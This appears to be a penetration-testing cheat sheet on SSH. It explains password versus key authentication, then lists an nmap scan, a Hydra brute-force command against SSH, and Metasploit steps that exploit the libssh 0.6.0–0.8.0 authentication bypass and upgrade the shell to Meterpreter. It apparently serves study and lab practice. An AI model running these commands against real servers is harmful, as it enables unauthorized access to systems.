# SSH

SSH (Secure Shell) is a secure protocol used for remote access and administration of servers and systems. It is the **successor to Telnet** and provides **encryption** to protect communication from interception.

By default, SSH runs on **TCP port 22**, but it can be configured to use any other open TCP port. Authentication in SSH can be set up in two ways:

* **Username and password authentication** – Requires a valid username and password.
* **Key-based authentication** – Uses cryptographic key pairs for secure access.

If an SSH server relies on **username and password authentication**, attackers may attempt a **brute-force attack** to guess valid credentials and gain unauthorized access to the system.

## Techniques

{% code overflow="wrap" %}

```bash
nmap -sV [TARGET IP]

# Bruteforce
hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/commomn_passwords.txt [TARGET IP] -t 4 ssh

ssh [USER]@[TARGET_IP]
```

{% endcode %}

## Exploitation

**libssh** is a cross-platform **C library** that implements the **SSHv2 protocol** for both **client and server**.

**libssh v0.6.0 to v0.8.0** has a **vulnerability** in the **server code**, allowing an attacker to **bypass authentication** and **execute commands** on the affected server. This poses a significant security risk.

{% code overflow="wrap" %}

```bash
nmap -sS -sV -O [TARGET]

search libssh_auth_bypass
use auxiliary/scanner/ssh/libssh_auth_bypass
set SPAWN_PTY true
sessions

search shell_to_meterpreter
use post/multi/manage/shell_to_meterpreter
show options
set SESSION
exploit
```

{% endcode %}